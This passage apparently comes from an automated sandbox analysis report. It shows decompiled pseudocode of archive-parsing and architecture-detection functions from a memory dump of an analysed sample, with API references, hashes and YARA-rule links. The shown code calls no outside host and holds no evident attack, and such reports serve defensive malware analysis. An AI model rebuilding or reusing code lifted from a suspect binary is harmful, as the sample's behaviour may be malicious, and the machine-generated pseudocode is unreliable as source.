                                          • GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403EDB
                                          • GetNativeSystemInfo.KERNELBASE(?,?,?,00403EFA,004060E6,00000001,00000001,00000000,?,00000000), ref: 00403EE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressInfoNativeProcSystem
                                          • String ID: GetNativeSystemInfo
                                          • API String ID: 2220751540-3949249589
                                          • Opcode ID: e22f0686ebb65b25f7cdc175e6ec18776ede25488796abf719b58fa9f8d677af
                                          • Instruction ID: 1a34752c2e7cb131041ffb1cf8b4a571675c73488951d52ca8f01a361a8aad4f
                                          • Opcode Fuzzy Hash: e22f0686ebb65b25f7cdc175e6ec18776ede25488796abf719b58fa9f8d677af
                                          • Instruction Fuzzy Hash: D4D0A7607042096ACB14DF71BD029DA77F896486487100174F802F00D0EAB9DD41D3A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041AE02, Relevance: 4.7, APIs: 3, Instructions: 220COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 16%
                                          			E0041AE02(signed int __ecx, signed int _a4, char _a8, short _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				void* __edi;
				void* __ebp;
				signed int _t108;
				signed int _t109;
				signed int _t120;
				intOrPtr* _t123;
				void* _t124;
				signed int _t125;
				signed int _t127;
				void* _t128;
				void* _t130;
				signed int _t134;
				void* _t138;
				void* _t141;
				signed int _t150;
				void* _t159;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t182;
				signed int _t185;
				void* _t187;

				_t181 = _a4;
				_t182 = __ecx;
				E00418567(_t181);
				 *((intOrPtr*)(_t181 + 0xe8)) =  *((intOrPtr*)(__ecx + 0x40));
				 *((intOrPtr*)(_t181 + 0xec)) =  *((intOrPtr*)(__ecx + 0x44));
				 *((char*)(_t181 + 0xe0)) =  *((intOrPtr*)(__ecx + 0x56));
				_t150 = 0;
				 *((char*)(_t181 + 0xe1)) =  *((intOrPtr*)(__ecx + 0x57));
				if( *((intOrPtr*)(_t181 + 0xe0)) != 0) {
					L16:
					_t108 = 0;
					__eflags = 0;
					L17:
					_t109 = _t108 + 1;
					__eflags = _t109;
					return _t109;
				}
				_t176 =  *(__ecx + 0x5c);
				_v20 =  *((intOrPtr*)(__ecx + 0x60));
				_v12 =  *((intOrPtr*)(__ecx + 0x64));
				_v8 =  *((intOrPtr*)(__ecx + 0x68));
				_a4 =  *((intOrPtr*)(__ecx + 0x6c));
				asm("adc ecx, ebx");
				_v24 = _t176;
				 *((intOrPtr*)(_t181 + 0xf0)) =  *((intOrPtr*)(__ecx + 0x40)) + 0x20;
				 *((intOrPtr*)(_t181 + 0xf4)) =  *((intOrPtr*)(__ecx + 0x44));
				 *((intOrPtr*)(_t181 + 0x128)) = 0x20;
				 *((intOrPtr*)(_t181 + 0x12c)) = 0;
				 *((char*)(_t181 + 0x130)) = 0;
				_t185 = _v20;
				if(_t185 < 0 || _t185 <= 0 && _t176 < 0) {
					goto L16;
				} else {
					_t187 = _v8 - 0x40000000;
					if(_t187 > 0 || _t187 >= 0 && _v12 > _t150) {
						goto L16;
					} else {
						_t108 = _v12 | _v8;
						if(_t108 != 0) {
							__eflags =  *((intOrPtr*)(_t181 + 0x134)) - _t150;
							if( *((intOrPtr*)(_t181 + 0x134)) == _t150) {
								 *((char*)(_t181 + 0x130)) = 1;
							}
							asm("adc ecx, ebx");
							 *((intOrPtr*)(_t182 + 0x70)) =  *((intOrPtr*)(_t182 + 0x70)) + _v12 + 0x20;
							asm("adc [esi+0x74], ecx");
							_t120 = _v12 + _t176;
							_t177 = _v8;
							asm("adc edx, [ebp-0x10]");
							_v32 = _t120;
							asm("adc ecx, ebx");
							 *((intOrPtr*)(_t181 + 0x128)) = _t120 + 0x20;
							 *((intOrPtr*)(_t181 + 0x12c)) = _t177;
							_t159 =  *((intOrPtr*)(_t182 + 0x48)) -  *((intOrPtr*)(_t181 + 0xf0));
							asm("sbb eax, [edi+0xf4]");
							__eflags =  *((intOrPtr*)(_t182 + 0x4c)) - _t177;
							if(__eflags > 0) {
								L19:
								_t123 =  *_t182;
								_t124 =  *((intOrPtr*)( *_t123 + 0x10))(_t123, _v24, _v20, 1, _t150);
								__eflags = _t124 - _t150;
								if(_t124 != _t150) {
									return _t124;
								}
								_t125 = _v12;
								__eflags = _t125 - _t125;
								if(_t125 != _t125) {
									L22:
									return 0x8007000e;
								}
								__eflags = _t150 - _v8;
								if(_t150 == _v8) {
									_push(_v12);
									L0041C16C();
									_v32 = _t125;
									_t127 = E0041670E(_v12); // executed
									__eflags = _t127 - _t150;
									if(_t127 == _t150) {
										_t179 = _v12;
										_t163 = _v32;
										_t128 = E0041BCE0(_v32, _t179);
										__eflags = _t128 - _a4;
										if(_t128 == _a4) {
											L28:
											__eflags =  *((intOrPtr*)(_t181 + 0x134)) - _t150;
											if( *((intOrPtr*)(_t181 + 0x134)) == _t150) {
												 *((char*)(_t181 + 0x131)) = 1;
											}
											_push(_t150);
											_v20 = _t150;
											E004192D4( &_v24, _t182, _v32, _v12);
											_t163 =  *((intOrPtr*)(_t182 + 0x38));
											_v16 = _t150;
											_v12 = _t150;
											_v8 = _t150;
											_t130 = E00418FB1( *((intOrPtr*)(_t182 + 0x38)));
											__eflags = _t130 - 1;
											if(_t130 != 1) {
												L32:
												__eflags = _t130 - 0x17;
												if(_t130 != 0x17) {
													goto L27;
												}
												__eflags = _t179 - _t150;
												if(__eflags != 0) {
													goto L27;
												}
												_push(_a20);
												_push(_a16);
												_t163 = _t182;
												_push(_a12);
												_t134 = E0041A63E(_t182, _t179, __eflags,  *((intOrPtr*)(_t181 + 0xf0)),  *((intOrPtr*)(_t181 + 0xf4)), _t181 + 0x100,  &_v16, _a8);
												_a4 = _t134;
												__eflags = _t134 - _t150;
												if(_t134 == _t150) {
													__eflags = _v12 - _t150;
													if(_v12 != _t150) {
														__eflags = _v12 - 1;
														if(_v12 > 1) {
															goto L27;
														}
														E00418E1D( &_v24);
														E004192FE(_t182,  *_v16);
														_t163 =  *((intOrPtr*)(_t182 + 0x38));
														_t138 = E00418FB1( *((intOrPtr*)(_t182 + 0x38)));
														__eflags = _t138 - 1;
														if(_t138 != 1) {
															goto L27;
														}
														__eflags = _t179 - _t150;
														if(_t179 != _t150) {
															goto L27;
														}
														L41:
														 *((char*)(_t181 + 0x130)) = 1;
														 *((intOrPtr*)(_t181 + 0x120)) =  *((intOrPtr*)(_t182 + 0x70));
														 *((intOrPtr*)(_t181 + 0x124)) =  *((intOrPtr*)(_t182 + 0x74));
														_t141 = E0041A836(_t182, _t179, _t181, _a8, _a12, _a16, _a20);
														E0041969C( &_v16);
														E00418E1D( &_v24);
														_push(_v32);
														L0041C160();
														return _t141;
													}
													E0041969C( &_v16);
													E00418E1D( &_v24);
													L25:
													_push(_v32);
													L0041C160();
													return _t150;
												}
												E0041969C( &_v16);
												E00418E1D( &_v24);
												_t150 = _a4;
												goto L25;
											}
											__eflags = _t179 - _t150;
											if(_t179 == _t150) {
												goto L41;
											}
											goto L32;
										}
										L27:
										E00418DE4(_t163, _t181);
										goto L28;
									}
									_t150 = _t127;
									goto L25;
								}
								goto L22;
							} else {
								if(__eflags < 0) {
									L15:
									 *((char*)(_t181 + 0x133)) = 1;
									goto L16;
								}
								__eflags = _t159 - _v32;
								if(_t159 >= _v32) {
									goto L19;
								}
								goto L15;
							}
						}
						if((_t176 | _v20) != 0) {
							goto L17;
						}
						 *((char*)(_t181 + 0x130)) = 1;
						return _t108;
					}
				}
			}
































                                          0x0041ae0b
                                          0x0041ae0e
                                          0x0041ae12
                                          0x0041ae1a
                                          0x0041ae23
                                          0x0041ae2c
                                          0x0041ae35
                                          0x0041ae37
                                          0x0041ae43
                                          0x0041af36
                                          0x0041af36
                                          0x0041af36
                                          0x0041af38
                                          0x0041af38
                                          0x0041af38
                                          0x00000000
                                          0x0041af38
                                          0x0041ae4f
                                          0x0041ae52
                                          0x0041ae58
                                          0x0041ae5e
                                          0x0041ae64
                                          0x0041ae6d
                                          0x0041ae6f
                                          0x0041ae72
                                          0x0041ae78
                                          0x0041ae7e
                                          0x0041ae88
                                          0x0041ae8e
                                          0x0041ae94
                                          0x0041ae97
                                          0x00000000
                                          0x0041aea7
                                          0x0041aea7
                                          0x0041aeae
                                          0x00000000
                                          0x0041aebb
                                          0x0041aebe
                                          0x0041aec1
                                          0x0041aed1
                                          0x0041aed7
                                          0x0041aed9
                                          0x0041aed9
                                          0x0041aee9
                                          0x0041aeeb
                                          0x0041aef1
                                          0x0041aef4
                                          0x0041aef6
                                          0x0041aef9
                                          0x0041aefc
                                          0x0041af04
                                          0x0041af06
                                          0x0041af0c
                                          0x0041af15
                                          0x0041af1e
                                          0x0041af24
                                          0x0041af26
                                          0x0041af40
                                          0x0041af40
                                          0x0041af4e
                                          0x0041af51
                                          0x0041af53
                                          0x0041af3d
                                          0x0041af3d
                                          0x0041af55
                                          0x0041af58
                                          0x0041af5a
                                          0x0041af61
                                          0x00000000
                                          0x0041af61
                                          0x0041af5c
                                          0x0041af5f
                                          0x0041af68
                                          0x0041af6b
                                          0x0041af78
                                          0x0041af7b
                                          0x0041af80
                                          0x0041af82
                                          0x0041af93
                                          0x0041af96
                                          0x0041af99
                                          0x0041af9e
                                          0x0041afa1
                                          0x0041afa8
                                          0x0041afa8
                                          0x0041afae
                                          0x0041afb0
                                          0x0041afb0
                                          0x0041afb7
                                          0x0041afc1
                                          0x0041afc6
                                          0x0041afcb
                                          0x0041afce
                                          0x0041afd1
                                          0x0041afd4
                                          0x0041afd7
                                          0x0041afdc
                                          0x0041afdf
                                          0x0041afe9
                                          0x0041afe9
                                          0x0041afec
                                          0x00000000
                                          0x00000000
                                          0x0041afee
                                          0x0041aff0
                                          0x00000000
                                          0x00000000
                                          0x0041aff2
                                          0x0041aff8
                                          0x0041affb
                                          0x0041affd
                                          0x0041b017
                                          0x0041b01c
                                          0x0041b01f
                                          0x0041b021
                                          0x0041b03b
                                          0x0041b03e
                                          0x0041b055
                                          0x0041b059
                                          0x00000000
                                          0x00000000
                                          0x0041b062
                                          0x0041b070
                                          0x0041b075
                                          0x0041b078
                                          0x0041b07d
                                          0x0041b080
                                          0x00000000
                                          0x00000000
                                          0x0041b086
                                          0x0041b088
                                          0x00000000
                                          0x00000000
                                          0x0041b08e
                                          0x0041b091
                                          0x0041b0a1
                                          0x0041b0b0
                                          0x0041b0b6
                                          0x0041b0c0
                                          0x0041b0c8
                                          0x0041b0cd
                                          0x0041b0d0
                                          0x00000000
                                          0x0041b0d6
                                          0x0041b043
                                          0x0041b04b
                                          0x0041af86
                                          0x0041af86
                                          0x0041af89
                                          0x00000000
                                          0x0041af8f
                                          0x0041b026
                                          0x0041b02e
                                          0x0041b033
                                          0x00000000
                                          0x0041b033
                                          0x0041afe1
                                          0x0041afe3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041afe3
                                          0x0041afa3
                                          0x0041afa3
                                          0x00000000
                                          0x0041afa3
                                          0x0041af84
                                          0x00000000
                                          0x0041af84
                                          0x00000000
                                          0x0041af28
                                          0x0041af28
                                          0x0041af2f
                                          0x0041af2f
                                          0x00000000
                                          0x0041af2f
                                          0x0041af2a
                                          0x0041af2d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af2d
                                          0x0041af26
                                          0x0041aec6
                                          0x00000000
                                          0x00000000
                                          0x0041aec8
                                          0x00000000
                                          0x0041aec8
                                          0x0041aeae

                                          APIs
                                            • Part of subcall function 00418567: ??3@YAXPAX@Z.MSVCRT ref: 00418597
                                            • Part of subcall function 00418567: ??3@YAXPAX@Z.MSVCRT ref: 004185A8
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0041AF6B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041AF89
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041B0D0
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID:
                                          • API String ID: 4113381792-0
                                          • Opcode ID: ba04f5ec6f22fd13dcbc83abe88cd386c8b6c2426f0760ab673ff78b0f27cfa3
                                          • Instruction ID: 7441eaed24261cedb068acf738b6ac121ac43d6cfe962bcb2839a80aef5be465
                                          • Opcode Fuzzy Hash: ba04f5ec6f22fd13dcbc83abe88cd386c8b6c2426f0760ab673ff78b0f27cfa3
                                          • Instruction Fuzzy Hash: 4C918C70A01606AFCF25DFA4C590AEEFBB1BF08304F10452EE45593311D779AAA1CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419328, Relevance: 4.6, APIs: 3, Instructions: 150COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00419328(void* __ecx, void* __eflags, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				void* __esi;
				signed int _t44;
				void* _t46;
				intOrPtr* _t48;
				signed int _t49;
				void* _t50;
				signed int _t53;
				signed int _t54;
				void* _t56;
				intOrPtr* _t58;
				void* _t60;
				signed int _t64;
				signed int _t66;
				signed int _t69;
				signed int _t73;
				signed int _t81;
				signed int _t84;
				void* _t85;
				void* _t88;
				void* _t98;
				signed int _t101;
				void* _t103;
				signed int _t105;
				void* _t106;
				void* _t107;

				_t60 = __ecx;
				_t98 = __ecx + 0x50;
				_t44 = E0041670E(0x20); // executed
				if(_t44 == 0) {
					if(E00419037(_t98) == 0) {
						_t46 = _a8;
						__eflags = _t46;
						if(_t46 == 0) {
							L7:
							_push(0x8000); // executed
							L0041C16C(); // executed
							_v24 = _v24 & 0x00000000;
							_t7 =  &_v20;
							 *_t7 = _v20 & 0x00000000;
							__eflags =  *_t7;
							_t88 = _t46;
							_v12 = _t88;
							_t64 = 8;
							memcpy(_t88, _t98, _t64 << 2);
							_t107 = _t106 + 0xc;
							while(1) {
								_t66 = _a8;
								_t81 = 0x7fe0;
								__eflags = _t66;
								if(_t66 == 0) {
									goto L13;
								}
								_t53 =  *_t66 - _v24;
								asm("sbb ecx, [ebp-0x10]");
								__eflags =  *(_t66 + 4);
								if(__eflags > 0) {
									goto L13;
								} else {
									if(__eflags < 0) {
										L12:
										_t81 = _t53;
										__eflags = _t53;
										if(_t53 == 0) {
											L30:
											_t101 = 1;
											__eflags = 1;
										} else {
											goto L13;
										}
									} else {
										__eflags = _t53 - 0x7fe0;
										if(_t53 >= 0x7fe0) {
											goto L13;
										} else {
											goto L12;
										}
									}
								}
								L31:
								_push(_v12);
								L0041C160();
								_t44 = _t101;
								goto L3;
								L13:
								_t48 = _a4;
								_v8 = _v8 & 0x00000000;
								_t49 =  *((intOrPtr*)( *_t48 + 0xc))(_t48, _v12 + 0x20, _t81,  &_v8);
								__eflags = _t49;
								if(_t49 != 0) {
									L33:
									_t101 = _t49;
								} else {
									_t69 = _v8;
									__eflags = _t69;
									if(_t69 == 0) {
										goto L30;
									} else {
										_t84 = 0;
										__eflags = 0;
										while(1) {
											_t50 = _v12;
											_t103 = _t50 + _t84 + 1;
											_t85 = _t50 + _t69;
											__eflags = _t103 - _t85;
											if(_t103 > _t85) {
												break;
											} else {
												goto L17;
											}
											while(1) {
												L17:
												__eflags =  *_t103 - 0x37;
												if( *_t103 == 0x37) {
													break;
												}
												__eflags =  *(_t103 + 1) - 0x37;
												if( *(_t103 + 1) == 0x37) {
													_t103 = _t103 + 1;
												} else {
													__eflags =  *(_t103 + 2) - 0x37;
													if( *(_t103 + 2) == 0x37) {
														_t103 = _t103 + 2;
													} else {
														__eflags =  *(_t103 + 3) - 0x37;
														if( *(_t103 + 3) == 0x37) {
															_t103 = _t103 + 3;
															__eflags = _t103;
														} else {
															_t103 = _t103 + 4;
															__eflags = _t103 - _t85;
															if(_t103 <= _t85) {
																continue;
															} else {
															}
														}
													}
												}
												break;
											}
											__eflags = _t103 - _t85;
											if(_t103 > _t85) {
												break;
											} else {
												_v16 = _t103 - _t50;
												_t54 = E00419037(_t103);
												__eflags = _t54;
												if(_t54 != 0) {
													_t73 = 8;
													_t56 = memcpy(_t60 + 0x50, _t103, _t73 << 2);
													asm("adc ecx, [ebp-0x10]");
													 *((intOrPtr*)(_t60 + 0x40)) =  *((intOrPtr*)(_t60 + 0x40)) + _t56 + _v24;
													_t58 = _a4;
													asm("adc [ebx+0x44], ecx");
													_t105 =  *((intOrPtr*)(_t60 + 0x40)) + 0x20;
													__eflags = _t105;
													asm("adc edi, ecx");
													_t49 =  *((intOrPtr*)( *_t58 + 0x10))(_t58, _t105,  *((intOrPtr*)(_t60 + 0x44)), 0, 0);
													goto L33;
												} else {
													_t69 = _v8;
													_t84 = _v16;
													continue;
												}
											}
											goto L31;
										}
										_v24 = _v24 + _t69;
										asm("adc dword [ebp-0x10], 0x0");
										memmove(_t50, _t50 + _t69, 0x20);
										_t107 = _t107 + 0xc;
										continue;
									}
								}
								goto L31;
							}
						} else {
							__eflags =  *_t46 |  *(_t46 + 4);
							if(( *_t46 |  *(_t46 + 4)) != 0) {
								goto L7;
							} else {
								_t44 = 1;
							}
						}
					} else {
						_t44 = 0;
					}
				}
				L3:
				return _t44;
			}

































                                          0x0041932f
                                          0x00419335
                                          0x0041933c
                                          0x00419343
                                          0x0041934c
                                          0x00419356
                                          0x00419359
                                          0x0041935b
                                          0x00419369
                                          0x0041936a
                                          0x0041936f
                                          0x00419374
                                          0x00419378
                                          0x00419378
                                          0x00419378
                                          0x0041937d
                                          0x00419381
                                          0x00419384
                                          0x00419385
                                          0x00419385
                                          0x0041938c
                                          0x0041938c
                                          0x0041938f
                                          0x00419391
                                          0x00419393
                                          0x00000000
                                          0x00000000
                                          0x00419397
                                          0x0041939d
                                          0x004193a0
                                          0x004193a2
                                          0x00000000
                                          0x004193a4
                                          0x004193a4
                                          0x004193aa
                                          0x004193aa
                                          0x004193ac
                                          0x004193ae
                                          0x0041944e
                                          0x00419450
                                          0x00419450
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004193a6
                                          0x004193a6
                                          0x004193a8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004193a8
                                          0x004193a4
                                          0x00419451
                                          0x00419451
                                          0x00419454
                                          0x0041945a
                                          0x00000000
                                          0x004193b4
                                          0x004193b4
                                          0x004193b9
                                          0x004193ca
                                          0x004193cd
                                          0x004193cf
                                          0x00419495
                                          0x00419495
                                          0x004193d5
                                          0x004193d5
                                          0x004193d8
                                          0x004193da
                                          0x00000000
                                          0x004193dc
                                          0x004193dc
                                          0x004193dc
                                          0x004193de
                                          0x004193de
                                          0x004193e1
                                          0x004193e5
                                          0x004193e8
                                          0x004193ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004193ec
                                          0x004193ec
                                          0x004193ec
                                          0x004193ef
                                          0x00000000
                                          0x00000000
                                          0x004193f1
                                          0x004193f5
                                          0x0041940c
                                          0x004193f7
                                          0x004193f7
                                          0x004193fb
                                          0x0041940f
                                          0x004193fd
                                          0x004193fd
                                          0x00419401
                                          0x00419414
                                          0x00419414
                                          0x00419403
                                          0x00419403
                                          0x00419406
                                          0x00419408
                                          0x00000000
                                          0x00000000
                                          0x0041940a
                                          0x00419408
                                          0x00419401
                                          0x004193fb
                                          0x00000000
                                          0x004193f5
                                          0x00419417
                                          0x00419419
                                          0x00000000
                                          0x0041941b
                                          0x0041941f
                                          0x00419422
                                          0x00419427
                                          0x00419429
                                          0x00419467
                                          0x0041946b
                                          0x00419472
                                          0x00419475
                                          0x0041947b
                                          0x0041947e
                                          0x00419489
                                          0x00419489
                                          0x0041948d
                                          0x00419492
                                          0x00000000
                                          0x0041942b
                                          0x0041942b
                                          0x0041942e
                                          0x00000000
                                          0x0041942e
                                          0x00419429
                                          0x00000000
                                          0x00419419
                                          0x00419433
                                          0x00419438
                                          0x00419440
                                          0x00419446
                                          0x00000000
                                          0x00419446
                                          0x004193da
                                          0x00000000
                                          0x004193cf
                                          0x0041935d
                                          0x0041935f
                                          0x00419362
                                          0x00000000
                                          0x00419364
                                          0x00419366
                                          0x00419366
                                          0x00419362
                                          0x0041934e
                                          0x0041934e
                                          0x0041934e
                                          0x0041934c
                                          0x00419350
                                          0x00419353

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@memmove
                                          • String ID:
                                          • API String ID: 3828600508-0
                                          • Opcode ID: a2b5249015b693312b776ec4cecfc9c29c3a0b3e0d8de30eab162b2433da8b2e
                                          • Instruction ID: e12da01f2eb493b1a38a8d6fc4e21457148e6801041be196bfadcbe32c4ccdd3
                                          • Opcode Fuzzy Hash: a2b5249015b693312b776ec4cecfc9c29c3a0b3e0d8de30eab162b2433da8b2e
                                          • Instruction Fuzzy Hash: A051D471E04115ABEF28CA54C864AEF77B5AF49304F14806EDC1AA7381D779ED82C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404D7F, Relevance: 4.6, APIs: 3, Instructions: 139COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00404D7F(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v32;
				char _v44;
				char _v56;
				void* _t46;
				void* _t54;
				char** _t61;
				void* _t67;
				char** _t74;
				void* _t79;
				char* _t102;
				char* _t105;
				void* _t107;
				char** _t108;
				char** _t109;

				_t107 = __edx;
				_v8 = __ecx;
				_t46 = E00403ECA(); // executed
				if(_t46 == 0) {
					_v20 = "x86";
					_v16 = "i386";
					goto L5;
				} else {
					_t114 = _t46 - 9;
					if(_t46 == 9) {
						_v20 = "x64";
						_v16 = "amd64";
						L5:
						_v12 = 0;
					} else {
						_v20 = 0;
					}
				}
				E004143C2(E004143C2(E004143C2(_t46,  &_v56),  &_v44),  &_v32);
				_t79 = 0;
				E00403F60(0, 0,  &_v56,  &_v44);
				_t54 = E004030D6(_v8, _v56, _t114, _v44,  &_v32); // executed
				if(_t54 != 0) {
					_t79 = 1;
				}
				E0041447C(_t107,  &_v32);
				_t102 = _v20;
				_t108 =  &_v20;
				while(1) {
					_push( &_v44);
					_push( &_v56);
					_t117 = _t102;
					if(_t102 == 0) {
						break;
					}
					E00403F60(0, _t102);
					_t61 = E004030D6(_v8, _v56, __eflags, _v44,  &_v32); // executed
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *(_t107 + 4);
						if(__eflags != 0) {
							E004144C5(_t107, "\r\n");
						}
						E004144FB(_t107, __eflags,  &_v32);
						_t79 = 1;
					}
					_t108 =  &(_t108[1]);
					__eflags = _t108;
					_t102 =  *_t108;
				}
				E00403F60( *0x422730 & 0x0000ffff, _t102);
				_t67 = E004030D6(_v8, _v56, _t117, _v44,  &_v32); // executed
				_t118 = _t67;
				if(_t67 != 0) {
					_t79 = 1;
				}
				E004144FB(_t107, _t118,  &_v32);
				_t105 = _v20;
				_t109 =  &_v20;
				while(_t105 != 0) {
					E00403F60( *0x422730 & 0x0000ffff, _t105,  &_v56,  &_v44);
					_t74 = E004030D6(_v8, _v56, __eflags, _v44,  &_v32); // executed
					__eflags = _t74;
					if(_t74 != 0) {
						__eflags =  *(_t107 + 4);
						if(__eflags != 0) {
							E004144C5(_t107, "\r\n");
						}
						E004144FB(_t107, __eflags,  &_v32);
						_t79 = 1;
					}
					_t109 =  &(_t109[1]);
					__eflags = _t109;
					_t105 =  *_t109;
				}
				_push(_v32);
				L0041C160();
				_push(_v44);
				L0041C160();
				_push(_v56);
				L0041C160();
				return _t79;
			}





















                                          0x00404d88
                                          0x00404d8a
                                          0x00404d8d
                                          0x00404d96
                                          0x00404db2
                                          0x00404db9
                                          0x00000000
                                          0x00404d98
                                          0x00404d98
                                          0x00404d9b
                                          0x00404da2
                                          0x00404da9
                                          0x00404dc0
                                          0x00404dc0
                                          0x00404d9d
                                          0x00404d9d
                                          0x00404d9d
                                          0x00404d9b
                                          0x00404dd6
                                          0x00404de7
                                          0x00404de9
                                          0x00404dfb
                                          0x00404e02
                                          0x00404e04
                                          0x00404e04
                                          0x00404e0c
                                          0x00404e11
                                          0x00404e14
                                          0x00404e5a
                                          0x00404e5d
                                          0x00404e61
                                          0x00404e62
                                          0x00404e64
                                          0x00000000
                                          0x00000000
                                          0x00404e1b
                                          0x00404e2d
                                          0x00404e32
                                          0x00404e34
                                          0x00404e36
                                          0x00404e3a
                                          0x00404e43
                                          0x00404e43
                                          0x00404e4e
                                          0x00404e53
                                          0x00404e53
                                          0x00404e55
                                          0x00404e55
                                          0x00404e58
                                          0x00404e58
                                          0x00404e6d
                                          0x00404e7f
                                          0x00404e84
                                          0x00404e86
                                          0x00404e88
                                          0x00404e88
                                          0x00404e90
                                          0x00404e95
                                          0x00404e98
                                          0x00404eeb
                                          0x00404eac
                                          0x00404ebe
                                          0x00404ec3
                                          0x00404ec5
                                          0x00404ec7
                                          0x00404ecb
                                          0x00404ed4
                                          0x00404ed4
                                          0x00404edf
                                          0x00404ee4
                                          0x00404ee4
                                          0x00404ee6
                                          0x00404ee6
                                          0x00404ee9
                                          0x00404ee9
                                          0x00404eef
                                          0x00404ef2
                                          0x00404ef7
                                          0x00404efa
                                          0x00404eff
                                          0x00404f02
                                          0x00404f10

                                          APIs
                                            • Part of subcall function 00403ECA: GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403EDB
                                            • Part of subcall function 00403ECA: GetNativeSystemInfo.KERNELBASE(?,?,?,00403EFA,004060E6,00000001,00000001,00000000,?,00000000), ref: 00403EE9
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404EF2
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404EFA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404F02
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$AddressInfoNativeProcSystem
                                          • String ID:
                                          • API String ID: 3731959171-0
                                          • Opcode ID: ab354cc5e28bab190b208fe8dee5894adaf34b6abae77628a8cceaf9d6bd5a61
                                          • Instruction ID: 22c72f549c8d9d607ce2050e0226bf1ce9e8af4da17dc6dbc20fb89fd3f62798
                                          • Opcode Fuzzy Hash: ab354cc5e28bab190b208fe8dee5894adaf34b6abae77628a8cceaf9d6bd5a61
                                          • Instruction Fuzzy Hash: 164132B1E0110EAACF04EF95C8819EFB77ABF84308F14412BE51577295DB3C5A46CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414864, Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00414864(void** __ecx, void* _a4) {
				void* _t20;
				signed int _t31;
				void** _t33;
				void* _t34;
				void* _t35;
				void* _t40;

				_t35 = _a4;
				_t34 = 0;
				_t33 = __ecx;
				if( *_t35 != 0) {
					do {
						_t34 = _t34 + 1;
					} while ( *((short*)(_t35 + _t34 * 2)) != 0);
				}
				_t40 = _t34 - _t33[2];
				if(_t40 > 0) {
					_t31 = 2;
					_t20 = (_t34 + 1) * _t31;
					_push( ~(0 | _t40 > 0x00000000) | _t20); // executed
					L0041C16C(); // executed
					_push( *_t33);
					L0041C160();
					 *_t33 = _t20;
					_t33[2] = _t34;
				}
				_t33[1] = _t34;
				memcpy( *_t33, _t35, _t34 + _t34 + 2);
				return _t33;
			}









                                          0x00414865
                                          0x0041486a
                                          0x0041486d
                                          0x00414873
                                          0x00414875
                                          0x00414875
                                          0x00414876
                                          0x00414875
                                          0x0041487e
                                          0x00414881
                                          0x00414888
                                          0x0041488c
                                          0x00414895
                                          0x00414896
                                          0x0041489b
                                          0x0041489f
                                          0x004148a6
                                          0x004148a8
                                          0x004148ab
                                          0x004148b4
                                          0x004148b7
                                          0x004148c4

                                          APIs
